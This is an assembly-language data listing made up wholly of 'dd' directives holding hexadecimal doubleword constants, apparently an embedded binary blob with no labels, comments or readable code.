dd 2EC441F8h, 5709FEA8h, 0F0170D1Bh, 0CC37F8E8h, 4376095Fh
dd 83F7EA0Ch, 65065005h, 21EC647Bh, 91560877h, 3842E819h
dd 5709EF41h, 88E40A24h, 206B02BBh, 0E02D24E3h, 24E21053h
dd 1412AC9Bh, 1981EEE8h, 0DC43106Ah, 4B647CF0h, 28B01FC4h
dd 32ACF8F2h, 0B61D575Fh, 70A5A29h, 7589F04Dh, 0AC7D32B8h
dd 8666CB61h, 5158DC12h, 0F8D3F722h, 0C4FFD845h, 0D4286AE7h
dd 0D4716618h, 8CD1DC49h, 0C8F03617h, 166CD8D4h, 0D80AD1F4h
dd 4614D425h, 884E0AB7h, 22B0156Fh, 350BB740h, 7404FC01h
dd 23F63077h, 93B701E0h, 3C9522B1h, 3BF08B0Fh, 5358C1F7h
dd 1485755h, 0B9FF5D6Ah, 3897C874h, 26011CB3h, 6EE43415h
dd 49E130EAh, 6A1E6E59h, 0A1986864h, 0D957E877h, 142C3570h
dd 497526F0h, 134D8209h, 0FC0E558Ch, 0C85B5D88h, 5E99283Dh
dd 0B4804E3h, 0C359345Fh, 930FD46Bh, 9AC71079h, 2D8BC29Eh
dd 0D8C91B8Eh, 3574E583h
dd 5D12EA31h, 9F5C5318h, 0FE3B3FF8h, 0CE221D2Ch, 2209DD5h
dd 917F5746h, 6344118Bh, 745FD50Eh, 21B9945Ch, 6869A65Ah
dd 4A40545Ah, 32448522h, 84850438h, 0B2B5E068h, 0E8180413h
dd 47B813D9h, 0A75CC9Ch, 3DCA0144h, 46D26F34h, 1C2C4565h
dd 848240D0h, 719CFCBCh, 58BE90C6h, 0B422B3F8h, 0D44A7C92h
dd 7E277929h, 17D1F24Ch, 0D644F54Dh, 0BA109110h, 0F5B6749Ah
dd 0F89B376Bh, 464C4E29h, 687401BFh, 481D8B53h, 14141DA4h
dd 893A87ECh, 125FE899h, 0F12B31D8h, 50709A51h, 48384BE0h
dd 666321Ah, 0E41226E0h, 0BA89D3FFh, 92D8B492h, 5F52E871h
dd 0A10492C7h, 9A6C127Ah, 2867BAF4h, 5C635750h, 0E49D6BD3h
dd 1E07C943h, 7E03B65Bh, 2257BB83h, 98245A6h, 0FCA1300Ah
dd 0C5B8CEBAh, 724FD999h, 193D5972h, 1AB764F0h, 804CBCA4h
dd 0C9568854h, 403D2A5h, 0C9505BA9h, 8B5FCC94h, 0CF9231FDh
dd 487ED0ACh, 832D0574h, 68E982E8h, 0BE4756A0h, 0B20DA434h
dd 88351B3Ch, 50742215h, 0C2C0330Bh, 4FB32A10h, 68041B26h
dd 8B912EEDh, 1511B698h, 0A237B254h, 5B3880BFh, 0D9B03589h
dd 0CB80C0Fh, 0F28B89ACh, 55573B87h, 894802A3h, 5EA4B41Dh
dd 9067ADA8h, 0A048A68h, 105040A0h, 0E812D672h, 98590336h
dd 7214A458h, 39C8D680h, 0E4C808C2h, 0B3E889F8h, 4C79920h
dd 0CA1F024h, 84EC18A7h, 0E4219B46h, 0DC888F11h, 0D0628344h
dd 0C8187711h, 216B4684h, 885F11BCh, 625344B4h, 184711A4h
dd 3B45849Ch, 84022131h, 0FC3822B7h, 0C08C51Bh, 22D8C42Ch
dd 8CC3120h, 0C0428C14h, 0B4100823h, 0C8FBD09Eh, 62F044A8h
dd 18E411A0h, 0D8468498h, 0CC118C21h, 0C0CA8490h, 884450Ch
dd 80C5B418h, 0C4A80C08h, 319C2278h, 8C900870h, 84236842h
dd 78886010h, 6C2250C4h, 6022D433h, 54083431h, 2328428Ch
dd 881C1048h, 2208C43Ch, 88142A30h, 2494B8C8h, 0CC08A18h
dd 0B4881811h, 0AC620C44h, 9C628413h, 86FAF410h, 8C7D9042h
dd 0DC238442h, 0D0887810h, 0C42268C4h, 0D2095431h, 0AC084831h
dd 0A008F58Ch, 2334428Ch, 88281094h, 2220C488h, 814317Ch
dd 8428C70h, 1B96422h, 0F0C85713h, 0B9702D68h, 6AD07E49h
dd 0B1C9F513h, 0F8AA1688h, 5FC9BF16h, 570DFE6Dh, 0EC219AE8h
dd 0BA1B938h, 4BD118Fh, 18225513h, 0D0BB3383h, 182253A5h
dd 2B2E8B77h, 322E6C7Ch, 83236116h, 0F4D4D6C4h, 5315CC57h
dd 11A9500Eh, 50E16D10h, 0B944E04Dh, 28F943D7h, 0CB460CDCh
dd 0BF11D421h, 0B344CC88h, 0A711BC62h, 35895E15h, 2C76E519h
dd 0CA121DCh, 0F4143074h, 5F3DA040h, 2340D0B7h, 4CDC9FE8h
dd 0FC187AAEh, 88FD340Bh, 0BD88FE43h, 0F55488F2h, 4103E980h
dd 3D3973E6h, 862EC51Ch, 0C627C7Ch, 0E604BF91h, 25E45FB8h
dd 99EA779h, 48BA14BEh, 4A51E82Bh, 7488330Eh, 0EC5E44C6h
dd 88F84CD8h, 20A00868h, 1FA532E8h, 80E0C66Bh, 0A9FC680Eh
dd 0E23850B1h, 7CE82299h, 0D10C4C0h, 42B1DF27h, 0ED266474h
dd 8EF58653h, 1A157529h, 38F4680Ah, 64B22F3Dh, 5EB3C0Ch
dd 5CBFB6AAh, 0E29990BEh, 28C725EDh, 75590BF2h, 3222EB24h
dd 459AFC08h, 50E68850h, 190B0FBEh, 58B2912Fh, 12205016h
dd 6EB32F9h, 5922D310h, 51AB5D5Fh, 2565DF2Fh, 0CF059A4h
dd 869C0CA0h, 94219843h, 8CC89090h, 8832AC64h, 800C8419h
dd 217C4386h, 0C8749078h, 326C6470h, 0F13511A8h, 12AB14E4h
dd 4BFAB90Fh, 57C3AE82h, 0E0048081h, 77033977h, 271CE834h
dd 3116D8A4h, 74424439h, 0AB145110h, 0A0DE180Eh, 1CA1C3A8h
dd 25410644h, 62254D71h, 3B118178h, 218A3C35h, 0ACA3F77h
dd 8625140Fh, 0A05E3474h, 7502F806h, 92818B2Dh, 48DE803h
dd 0E6830F70h, 0CC06BBF0h, 0FE5A5E10h, 1F4040DAh, 0C1C68B04h
dd 408104E8h, 57491E80h, 950DEBDCh, 420599C3h, 0C6835E01h
dd 55562C0Fh, 0AF4034A4h, 0B014C0F1h, 578A23ABh, 9605E64Fh
dd 99A1104Dh, 0D1FCC1F5h, 3BC60F03h, 45D76FEh, 0AB820FF8h
dd 0C7F72544h, 1475005Ch, 8302E9C1h, 0F9E6E27Bh, 29720800h
dd 24FFA5F3h, 36583095h, 0BAC78B7Ch, 0E9831DA0h, 0C72041Dh
dd 30FEE05Eh, 708530C8h, 0E198335h, 903F688Dh, 0E2EC119Fh
dd 0AC0B8066h, 23D04409h, 68AD107h, 46430788h, 9E47AB01h
dd 0AF026D0Ch, 0C6B49012h, 425DC72Ah, 498DC5CCh, 26172C29h
dd 0E6413B68h, 290BA611h, 46192490h, 1A424745h, 66409C8Ch
dd 93C0F4Fh, 892C3444h, 241C1224h, 0A80C4814h, 0E48E1D47h
dd 328F1D89h, 912EE811h, 12E9EC22h, 22912EF0h, 0F812E9F4h
dd 0FC22912Eh, 4728DE8h, 3038EE1h, 14F849F0h, 0F148F10Ah
dd 7C09C870h, 15B9091h, 0C95F5E63h, 9E92EEC3h, 0FA8C0C1Ch
dd 0A48A1286h, 0BAA0EB6h, 748D2C30h, 7CD03163h, 809CA439h
dd 0D0A8724h, 0FC18E4FDh, 8437F0F1h, 66D9F724h, 0F0E9A09Eh
dd 0F94490A9h, 0F8102B62h, 0F0228636h, 0B086637h, 50450928h
dd 1B03DC92h, 4EABE03Bh, 574FB328h, 98DAB643h, 0A49C203Ah
dd 0EF06EE64h, 0A58C7E8Ch, 2890942Ah, 0ACA74BB6h, 29ACEE14h
dd 4624AFEFh, 9A515A17h, 32A4A35Ch, 0B409AC0Fh, 0C448BC24h
dd 0D422CC91h, 6852E745h, 11992E1Ch, 91481718h, 10897414h
dd 0C914817h, 17088974h, 74049148h, 20CA9893h, 0C380CCEh
dd 1809C808h, 8C522C91h, 0B645B8D0h, 1045884Fh, 1443845Eh
dd 0CCB2B895h, 8B2C0194h, 2C3AC554h, 0F7098F4Ch, 3CA819C2h
dd 763A02F0h, 0A2E2C01h, 19261E9Dh, 0E5251261h, 601DE5E4h
dd 41F81091h, 1964B6B0h, 1F13112Bh, 0C18387D9h, 3DC23704h
dd 44D2E936h, 90F7D1A0h, 0E0D1D01Bh, 0CC924077h, 9A40C25Ah
dd 28A1474h, 0E98BC642h, 0E06F6341h, 0A886B028h, 68D0B266h
dd 42D2225Ch, 62C922CAh, 0EB0296C1h, 615CB5E1h, 7B1329D1h
dd 68D0FF04h, 0A1A5B014h, 0CEE80B8Dh, 4704FD71h, 0BF44080Fh
dd 0BF8A8452h, 0E8EC3D12h, 15E80C82h, 881011AFh, 74046401h
dd 39B742EEh, 0C9E8403Dh, 33D61175h, 0A1149D81h, 0F084D36Ch
dd 0D04E16A0h, 8B53030Ch, 9281B45Ch, 47853C3Dh, 1E381D88h
dd 58A1CA29h, 8B22C084h, 15C0540Dh, 0FC718D56h, 72F01F3Bh
dd 9856BE13h, 42E1048h, 52320A2h, 685EED73h, 18952220h
dd 59132A11h, 828C58Fh, 19442411h, 5BDB8530h, 7B812690h
dd 7D874D89h, 68F89263h, 8AAB3BCAh, 0E0580D73h, 0EDEB04C6h
dd 6950EC97h, 124279CCh, 0A120A922h, 89E0140Ch, 3B1E151Ch
dd 3B05EADDh, 0A8275A05h, 89E81B7Ch, 892E0858h, 115612E6h
dd 24E21221h, 24142252h, 415048E0h, 8048A107h, 8D45EB0Fh
dd 95FF3485h, 0A5187691h, 4AA0FAABh, 128D471Bh, 877DB466h
dd 0C0BC66Bh, 9D05DC40h, 7EB9D40h, 0FD5FEB9Dh, 83BC7D84h
dd 0BFE0750Ah, 3A51843h, 46A1A35Fh, 0B70FFC5Eh, 5FC4528h
dd 0F821FA42h, 0F288F610h, 0E809BC48h, 7525629Ch, 1469B689h
dd 89E141C9h, 0D26D3601h, 200C7062h, 74D28504h, 8AD04764h
dd 0FE5709B0h, 0FA832CF9h, 1D2D17F2h, 3E1C70Ah, 802BF574h
dd 4947078Eh, 8BFA7503h, 0EBE0C1C8h, 708A503h, 53CA9710h
dd 749B413Eh, 0BBABF306h, 4A496477h, 7C5F7F59h, 0E89326h
dd 9D09BEA4h, 9488645Ah, 56168183h, 380A40E8h, 744A9EE6h
dd 5F149C36h, 0EB297D0Ch, 2613F73Ah, 0CB917AE8h, 17784662h
dd 43C7B255h, 47A8F4DFh
dd 0BCE8FC82h, 0FEB1390h, 24717096h, 9FCF0A09h, 0F704CCA9h
dd 0F8D803C1h, 84413201h, 0F90408Ah, 49BEF175h, 10E0CA8h
dd 24FEFFBAh, 0EA82037Eh, 0C22CC1F0h, 0E0A93A64h, 681E201h
dd 418BE874h, 327459FCh, 246D04B0h, 7C9ABC24h, 0D94A0F13h
dd 8DCD0F60h, 56A0417Fh, 0C364C12Bh, 0FD2CFE14h, 0D3FC9185h
dd 202C6FE2h, 9389AFD3h, 170CCE09h, 1AD3E006h, 126437EDh
dd 0C73ED3E4h, 3A42ECF9h, 1CA5A827h, 4DFFCD30h, 0F08B09E4h
dd 19A20878h, 0E612080h, 8245A70Dh, 0FEAEE832h, 0A872A7A0h
dd 0D050C952h, 1044994Dh, 5BA54459h, 0E44D55E4h, 0A47F3241h
dd 5C103D8Eh, 0DE2054E5h, 803714Ch, 0A48D6AEBh, 0C0E8DB4h
dd 319357DAh, 3B880F91h, 112CBF52h, 101A2323h, 0FE79E30Eh
dd 0F4FEEAF3h, 0FD0AC908h, 480AB68Dh, 60A60C1Dh, 118A1910h
dd 64052D48h, 30471788h, 5EBEE63h, 8315897Dh, 686804C7h
dd 2A6F6ADEh, 0E1E66C11h, 98347461h, 0B8275C44h, 0D0126A44h
dd 0C7CD6B10h, 296F2672h, 0C6070966h, 0D0A0247h, 0A68812ECh
dd 0A2A6B608h, 831404F3h, 0ACDC8C3Dh, 0F7E1CAAh, 6A07B644h
dd 0C2E86AC0h, 0A07C9923h, 4F62B00Fh, 8AEB0080h, 0E0834104h
dd 38306B4h, 3BD2EB47h, 97E372Ch, 0EE8B2DFEh, 2BEEED58h
dd 10047528h, 44DB332Bh, 46A0C04h, 9081A6C2h, 0A4A10B41h
dd 0D270413Dh, 393DFC28h, 465C8A9Bh, 0EB0331D0h, 2FD83CFh
dd 275C386h, 0B0F1D8F7h, 0E469A024h, 7535A20h, 0A526E31Eh
dd 0F722A4D9h, 0F23A76B0h, 33FFBAEh, 0FEADCBh, 8AA6F337h
dd 1D029046h, 47473AC9h, 27740477h, 0D1F71049h, 5B4BC18Bh
dd 55312313h, 297820A3h, 6A1507Ah, 0FDC01269h, 5420F43h
dd 0A269EA7h, 0F8C18216h, 0A622510h, 51C39201h, 1D492E3Dh
dd 7242608Dh, 0E9812814h, 52D500Ch, 18015485h, 2BEC0673h
dd 1AC48BC8h, 82EDE1E8h, 500440F4h, 5C9092C3h, 424A3B17h
dd 3ED868C6h, 0E843B85Eh, 4B54FEC8h, 8B49815Dh, 63C3D9E5h
dd 0A0413950h, 4CB8E006h, 58D42501h, 4365296h, 89B802D6h
dd 565B2EC4h, 6BC0FC27h, 0CBE068FEh, 0A00D6483h, 0B375C22Dh
dd 0C2354805h, 70605831h, 4248210Ch, 6D502EB6h, 8D28D8E3h
dd 8B763402h, 0AE89B30Ch, 30488CA4h, 9804F47Ch, 68121C09h
dd 0F92E6801h, 6F40FC98h, 12C054FFh, 8F64C3EBh, 442CE105h
dd 0B04F8DD1h, 0AA9064B8h, 79811080h, 31690451h, 7051FD58h
dd 39E652BBh, 5F608ECh, 8B839CA6h, 2430BBD9h, 0A53EB0Dh
dd 18F95909h, 43064B89h, 0D6BEC04h, 0C25B590Ch, 568043D0h
dd 583032E8h, 8CA5CFE9h, 0FBA4085Dh, 5D69A290h, 0F765828Eh
dd 0FE59840h, 0D826985h, 26D3F678h, 3CFCB848h, 73447EECh
dd 0A4087B80h, 8D613DC2h, 41B27628h, 5645E88Fh, 6B28557Ch
dd 18C6A910h, 48855E5Dh, 330CFC0Bh, 534D3C78h, 0D9A9E827h
dd 3D041974h, 0DE1A9056h, 6A6F08CCh, 5C9C7690h, 2F61E80Bh
dd 39042FB3h, 79BF0CACh, 1B7B51FAh, 0EBE834D9h, 0DCB852A1h
dd 0CA1C5377h, 5D15507Eh, 80FF646Ah, 535D639Eh, 5589952Fh
dd 29CA22EBh, 501C88C0h, 851808C9h, 253479CDh, 352AE256h
dd 35598259h, 148632D6h, 10623BECh, 0ED185A68h, 1728E234h
dd 24018734h, 77F9E9C0h, 0E4780584h, 609E5EFAh, 0D5B03B28h
dd 74A3CE5h, 46068A2Eh, 38472730h, 0EF2F4C4h, 1A3C412Ch
dd 0E180C920h, 0CDB00220h, 0E05386F6h, 0E738CF0Fh, 0C0E0D274h
dd 750FFF1Ch, 34EB16BEh, 31BFB5B8h, 2740125Eh, 0D8021F11h
dd 0FD045005h, 14D720D3h, 4D4C2FB9h, 118015C9h, 0DA74C338h
dd 0D8F2C01Bh, 3A5BFF2Dh, 570A9137h, 5A61C721h, 93F5953Fh
dd 71D1692Dh, 4F307401h, 35CF58B0h, 4607A114h, 15F5D038h
dd 0D00BAE74h, 0A200BB2h, 45F57524h, 0C3C6852Fh, 0A1F0110Fh
dd 0FF7E8DEBh, 0BA0261E8h, 22286BCCh, 9A0312C2h, 41C9C475h
dd 18659D03h, 550D66D2h, 0DFE823C1h, 60B16CEBh, 0C20B8A6Bh
dd 292123E9h, 1B9D8D5Dh, 0A2C71A30h, 3997706h, 8A940FC8h
dd 0FA795827h, 793C3A7h, 8AD23345h, 1049DFD4h, 0C88B3420h
dd 0F6A4E181h, 0C670DFCh, 8C1C11Dh, 16BACA03h, 10E806C2h
dd 2E1104A3h, 862F633h, 0F9A70270h, 1B1C1FA2h, 0FCE45BB0h
dd 6C2D7997h, 3423E927h, 48A39D89h, 2AE807C0h, 4D20266Fh
dd 2D426560h, 15EA0F23h, 0A83C1205h, 0D05864ADh, 78A4CC82h
dd 0E830445Dh, 0D922A637h, 98F69CF3h, 4F7401D0h, 0D4190906h
dd 0A31E450h, 9C753C58h, 2C634D6Ah, 2D112047h, 456DF063h
dd 2A1234A0h, 0EC10827Fh, 890922E8h, 50984D01h, 20E4E851h
dd 0FA7B272Bh, 98758FC8h, 833F1CCCh, 0E7683D32h, 0F178C301h
dd 8F292887h, 0B779834Ah, 79680BCCh, 0BA4088C1h, 25286134h
dd 92118562h, 0A7265929h, 0CD0684ABh, 38B84770h, 0D11F0F51h
dd 955D2BD0h, 0A9F489E7h, 0B59EE6EDh, 0E1089B62h, 8166C0A2h
dd 5A024D38h, 488B1475h, 0FCA783Ch, 8AC1030Dh, 0E881A23h
dd 0D41B40A9h, 0B1B40146h, 122CB841h, 0FAFCE800h, 767EEB97h
dd 0B305B7C6h, 94084AC7h, 0E671C994h, 0BD831A85h, 20C00E9h
dd 6C121175h, 62720588h, 2E9DF08h, 0D442B75Eh, 906802EDh
dd 50762750h, 6A5FEC6Ch, 0F13863Ch, 0A133D084h, 21058D8Dh
dd 6009D38h, 18A1374h, 7C611D3Ch, 7F7A0008h, 88202C04h
dd 19D230F9h, 42ED7529h, 7E166A0Dh, 11E821E2h, 7CDC6AFAh
dd 321AA408h, 641049EBh, 0BD759455h, 0A04142B3h, 0CB8B413h
dd 642F563Fh, 4382F346h, 0FD0B9E82h, 0E0275D0Ah, 646A3E9Dh
dd 0B88D1C2Ch, 7F1B6E98h, 83403089h, 0B8183854h, 0FC39800Eh
dd 88040A75h, 923CEB19h, 0F0E516F2h, 2842700Fh, 66020C2Dh
dd 26571D74h, 690A1881h, 6CE8D401h, 0B5C798E8h, 6927D80h
dd 9255CB59h, 2873DE03h, 5C72A278h, 9259A74Eh, 0D3940F0Fh
dd 0A0484148h, 41A35AC4h, 0E8367475h, 8B65B793h, 75D348FBh
dd 14686A0Dh, 4B21A774h, 8F0AEB59h, 0A71875C3h, 5F0D0B5Eh
dd 0A7690FE5h, 0CEAA44C8h, 687AD5A4h, 315CF8AAh, 38B322DBh
dd 90017525h, 68258369h, 3BAD1B30h, 0C60734A8h, 112CA366h
dd 21971998h, 2405C7B7h, 0F8EB0DA7h, 1FA19028h, 800C8D1Eh
dd 2083815h, 73C13B88h, 8F385414h, 8187502Bh, 724B0CFAh
dd 14CE0750h, 0EEE8EB34h, 102544F3h, 0BC530884h, 6F418F95h
dd 1FE8B57h, 792BFCE6h, 7FEFC1F0h, 69CF090Fh, 725404C9h
dd 44018C85h, 0ED009A52h, 490E8BF0h, 0C1C17DF6h, 850FFC12h
dd 8733BFE6h, 1C8D3114h, 0F455E73Fh, 3FFC5693h, 12E3F80Ch
dd 3C00C2F6h, 7E750C5Dh, 3A04FAC1h, 3F16834Ah, 7471D76h
dd 0C74B8B5Ah, 7508313Bh, 2020824Ch, 0DCBB1E73h, 0CA8B8546h
dd 4C58C0D3h, 0F7770402h, 0B85C2100h, 7509FE44h, 0DC82AB28h
dd 8DE19587h, 2154E04Ah, 0B89C1F70h, 4521D9C4h, 69590806h
dd 8F4A0C04h, 8059E62h, 5B818153h, 0F4C8EB04h, 2EC55A89h
dd 955F0C55h, 85213F1h, 0D1312BFFh, 0F85D6380h, 97A5E3DAh
dd 21B512F4h, 0FF752BECh, 0FBC1250Dh, 5603604h, 5E4B010Ch
dd 276DE3Bh, 9066D38Bh, 8089D12Ch, 0DDD63B39h, 0DA0D3B25h
dd 42CE6374h, 0BE8E7114h, 83400870h, 0BE1C08FBh, 0EED3CB60h
dd 21D615F7h, 4C02BA74h, 26750403h, 0EB319A90h, 4B8D1F0Ah
dd 1DA21FE0h, 68B8B456h, 71C4BA41h, 9A07975Ah, 4E899249h
dd 1FCC0C93h, 7524CAE0h
dd 0B15D47CFh, 0C3F47D83h, 30EAEDDFh, 508B814Eh, 245C6C44h
dd 20BD04D1h, 655E6D94h, 705FB752h, 0C9883CDh, 60751E3Bh
dd 54208A49h, 4D0E8851h, 0B8C1FE0Fh, 98257319h, 8292F7A8h
dd 89602D0Eh, 1C1909EDh, 0AE44516Eh, 29DD18FDh, 47102552h
dd 0A3262067h, 0BA212156h, 8494EA9Eh, 1009C5B9h, 891C12E8h
dd 30448E06h, 0F8C112DAh, 0F73A2008h, 7E35A189h, 0DC22F033h
dd 280D8B1Bh, 4C35B01Dh, 83A194A1h, 0C48030Fh, 5280A627h
dd 5110FF9Bh, 20A4D6FFh, 5C18338Ah, 8555009h, 403A0C0Fh
dd 0A483100Dh, 5819DA88h, 48FE2185h, 8F0B2743h, 0BA798067h
dd 830901A8h, 54FE0460h, 0FF44B012h, 535969FEh, 0C701A1Ch
dd 14132CB6h, 0DAECBE10h, 8B7BF646h, 482F499h, 41E0C180h
dd 2953C8C3h, 4CC0BC2Bh, 0EA51EC11h, 0E0144B48h, 2654AD7Bh
dd 84E45BAh, 300DD94Ah, 23053B0Ah, 4B027612h, 0C614086Dh
dd 0B153992Fh, 493D8945h, 3D4AFBA5h, 0A935EB2h, 5A641429h
dd 0CD3A3163h, 823C1457h, 6023582Dh, 0E18317BEh, 0F23B2F0h
dd 4904F9C1h, 7D20075Dh, 0FFCEF20Eh, 0C4D40B63h, 0F46BA057h
dd 84C2EB4Bh, 3A356E0h, 0E8D3F633h, 3F0A1F4Fh, 0D88468A1h
dd 98C0DF3Bh, 0B2197308h, 23EDF923h, 0FE8758B9h, 3175CF0Bh
dd 0F414C383h, 33C6FC5Dh, 0F11E772h, 0DA8B7975h, 1127D8EAh
dd 2305B215h, 3479E6EBh, 734B5963h, 787BF211h, 29B1E767h
dd 42EDEB55h, 55142638h, 30121C0Dh, 0E80E21EEh, 79BC6238h
dd 3BDB8530h, 0FE531474h, 591FCCDAh, 1FE10B8h, 0A9A143EAh
dd 2B6A2138h, 0FE95206h, 1D89292Bh, 3C2AB7A6h, 0C8A0FA2Eh
dd 5CDFFC55h, 13908C49h, 0BA7CBBB4h, 7D899444h, 6413A437h
dd 10552470h, 2A885ADEh, 980BFA48h, 9D18DF03h, 84914C17h
dd 4F98FF3Bh, 0B7853BD7h, 39805F87h, 7874D70Bh, 59AD2E9h
dd 0DFFF3398h, 30495861h, 75CEB14Ch, 3067A60Dh, 5FCB206Ah
dd 7C00C985h, 47E1D105h, 0C68BF7EBh, 88F95443h, 1F2B0A2Ch
dd 615EF19Ah, 4EF4FEC6h, 593FE883h, 0C84CE77Eh, 899F726h
dd 4A96010Dh, 12E0221Ch, 0BFF8361h, 1312B85h, 4E0F62CFh
dd 0EA38DFC2h, 0ECF40053h, 77885C23h, 0FE09C144h, 6538750Fh
dd 0EC36827Ah, 0E1EB0B21h, 15634FCAh, 96412C91h, 86599F23h
dd 6F541936h, 2D1A99A2h, 0B29B8689h, 7A06D264h, 0F87D3AC1h
dd 0BE79B943h, 81ACDEDh, 8587CE12h, 0AAA20894h, 0C0F17C2Ch
dd 46DCA6A0h, 516552F7h, 0CD0C221Bh, 0C1649E72h, 0FE0206C0h
dd 297D0B21h, 9731C261h, 25BD87DFh, 0B1BFC694h, 0EFD3CEC0h
dd 0BAE3B09h, 7CF2908Bh, 2FEBAF82h, 0D0A2996h, 21E04E8Dh
dd 527B55B2h, 0BC8D2917h, 8A2EB5AEh, 37091986h, 0B3CF82Ch
dd 0A890B0Eh, 0FC010956h, 33FF344Bh, 0D1BBF075h, 13014628h
dd 0A0FC3224h, 440EB1B9h, 209E798Dh, 3B1AC43Eh, 0E1EDC91Dh
dd 0D899BD12h, 712D2A2h, 25817099h, 428D0889h, 4D096304h
dd 240D8403h, 0CEDC564Bh, 3075C185h, 50895DC1h, 0C46B7065h
dd 5719C831h, 544495B1h, 51B3AC57h, 0D29B2889h, 3E0DC989h
dd 0C4680B01h, 0B06AB79Ah, 31134662h, 2C8134C9h, 0F568DAF4h
dd 2A74E800h, 4CB8046Ah, 9B51205Ch, 15A91476h, 0CC51A50h
dd 8205EF75h, 0FA9A5710h, 0C200844Eh, 22E24E7Dh, 7E47C60Eh
dd 59056504h, 0BB838463h, 5FC61722h, 88D21FFCh, 71FE57E1h
dd 415FC998h, 0C36174B1h, 44E05024h, 3898C343h, 8299697Dh
dd 0F9095A17h, 0C8839A30h, 0D40840F7h, 0C03B9C06h, 941F4A24h
dd 0C11786FBh, 79DD03E7h, 1082680Ch, 94C28011h, 0A6B79C8Ch
dd 93E989D2h, 0C1977511h, 0FA3B0070h, 653C7A77h, 8748F047h
dd 0EC8841F3h, 0FBF5350Fh, 0F1DFCBBh, 0F09140C7h, 1EA74355h
dd 48060FD2h, 0E880C704h, 5158123h, 2DC75744h, 76CA3BB0h
dd 247394C7h, 50C0484h, 0D105F5F8h, 0D04FB95Fh, 4A378DADh
dd 2068120Ch, 9E641990h, 0D6BC8644h, 8A1CE444h, 0C8D34346h
dd 0C0840C05h, 4E887BD1h, 90375F0h, 0BA047809h, 0EA049A6Ch
dd 5021D2F7h, 0E7C366C2h, 0FD0C15B5h, 0EE105265h, 2184B26h
dd 17708DD7h, 0EA72512Bh, 0C19E01B7h, 85610FEAh, 4FB08332h
dd 3B5949FCh, 5C2C505Dh, 1389395Bh, 0F95806Fh, 3BC55F8Eh
dd 0CBAC3F6h, 3134FE8h, 0F33BD91Eh, 0D3458F8Fh, 0F1981B35h
dd 248EB23Fh, 184F0676h, 5F8B1159h, 3E7E498h, 202C0B48h
dd 54161F73h, 4C8DF809h, 42F2C401h, 122B2390h, 7C188424h
dd 904E9C22h, 0ED4FF578h, 989A794h, 897F0665h, 10308365h
dd 4C01CE2Bh, 0E1737DF8h, 41AA9C43h, 3F7DC5Dh, 0FFC10C2Ah
dd 8A374F04h, 0C4893031h, 0F45F40FBh, 0FB411CFEh, 0AD5BCC02h
dd 0CB51240h, 1846C680h, 62620CDEh, 5C751E3Bh, 2078CC1h
dd 0E51324FFh, 2104F24Ch, 0CF64E11Eh, 15E68474h, 0CF8266B9h
dd 21A525EBh, 0B733C410h, 0BA848A48h, 4F2D2E6Dh, 5548C1D2h
dd 169D620Ch, 43533244h, 1301740Bh, 79247F87h, 0D842FC46h
dd 0E9F82A22h, 2FB4474Eh, 0C343EEC0h, 3A8D0F0Fh, 0DF0D0D4Eh
dd 0A434B529h, 5C6EC54Bh, 0DBA59733h, 0E9C45242h, 0F48323CEh
dd 0F65EC4D8h, 8B5C2BC5h, 751EF869h, 2A0532A5h, 3B922219h
dd 0D0752E09h, 516C9E9Dh, 67411CEh, 0E8B7A22h, 4E906C45h
dd 774706E2h, 7A48EE6Dh, 0D718177h, 40300FE6h, 0E6DE038Fh
dd 763D0C74h, 7B88EE63h, 7B6E4B10h, 6D715ED2h, 725CFB31h
dd 0AE89D3EEh, 9C6218A8h, 0E31E6BAEh, 233940A1h, 44CE8862h
dd 0E68B250Fh, 91792240h, 3D4E6462h, 389092Eh, 0FC184C02h
dd 0F69143F0h, 603D8384h, 0FF2761A8h, 0C3C0DA6Ah, 19C150BEh
dd 20681DEBh, 0E05BF3C6h, 0F685F08Bh, 0C840F12h, 0C42D7322h
dd 0CF70B1D1h, 0D5072A94h, 5D85F88Bh, 0CF6ADF40h, 1962934h
dd 578D86F9h, 22033D34h, 5CB850AFh, 75F01A3Bh, 0A09E41Eh
dd 46A36361h, 54431C08h, 8501C3Fh, 89150AEBh, 2C09A106h
dd 501228BBh, 888B0935h, 87518D30h, 988ED868h, 143491D9h
dd 0B2189BFFh, 7EEBC14Eh, 81CBCB47h, 0F1B9EDA1h, 0D28F2DBBh
dd 0FE0FD83h, 234AC29Dh, 4532D173h, 0E4483289h, 0FD812594h
dd 7C2DE6D2h, 0FC0B0BE3h, 0A2E912C2h, 0EC5941h, 0F83BC303h
dd 75801B73h, 971D68Fh, 81034776h, 4A9C707h, 811B9EF0h
dd 0EB03B529h, 0A2C68BDCh, 0D0BEE627h, 4C22FF71h, 0ACFE8129h
dd 32B77416h, 0B28C13D2h, 5D894A8Ch, 6F71310Dh, 10393308h
dd 58DA7035h, 0A3C144F7h, 0CD4314D1h, 0ECD2120h, 34899199h
dd 41A66D06h, 84696AAAh, 1A0D9142h, 29AAE555h, 83578A06h
dd 8DFF13EDh, 8F31382Dh, 7D54D2BEh, 3FF01B68h, 0BA219DAEh
dd 0C5713975h, 38A4D68h, 957A29DFh, 0A0928550h, 83281FA5h
dd 0D77F90Fh, 4628A597h, 644807B9h, 2887C726h, 653CF73Ch
dd 0FE269873h, 0EB81280Dh, 0EF833D30h, 7DDB8585h, 2123C9B2h
dd 476C850h, 822C743Dh, 75FF1879h, 0D3017D26h, 3D5A2041h
dd 420C12E7h, 19FA5222h, 200849EFh, 0E85F5131h, 535920B4h
dd 7419A53Bh, 60087E0Ah, 50698F99h, 7C5C1A27h, 0A2BA9F67h
dd 3BCAC680h, 7610410Ch, 4B140A05h, 0CF09C772h, 0EB3774C0h
dd 0F13A8EEh, 57093175h, 84F17CBAh, 0A0FFE681h, 0F2123BDFh
dd 4A542072h, 0D0E34D9h, 66C8AA80h, 0E2E15081h, 1EC16E2Bh
dd 645EC287h, 44CEC1F8h, 0C455C608h, 5E578270h, 482B8BAAh
dd 0CF95803h, 18C82E1Ah
dd 5A00D71Dh, 80100111h, 38982164h, 26C71188h, 40170440h
dd 5FF1775h, 6690FBA4h, 2F200681h, 0E810FE01h, 0B255FEA4h
dd 5F315E35h, 0DF17DA70h, 0BFB49536h, 7EC21C37h, 186A6108h
dd 0C72D403Bh, 0E883C62Bh, 3F69CF5h, 820CE0CEh, 58F93BC2h
dd 3A7309F0h, 0CEE30F8Bh, 1A7CCBE0h, 45F3902h, 0F0531576h
dd 1B92F27h, 0DFB82A73h, 0EA2E095Bh, 51429AC7h, 2D3822B1h
dd 619C872h, 0C04E0246h, 0C9187EA8h, 858BF826h, 337342E0h
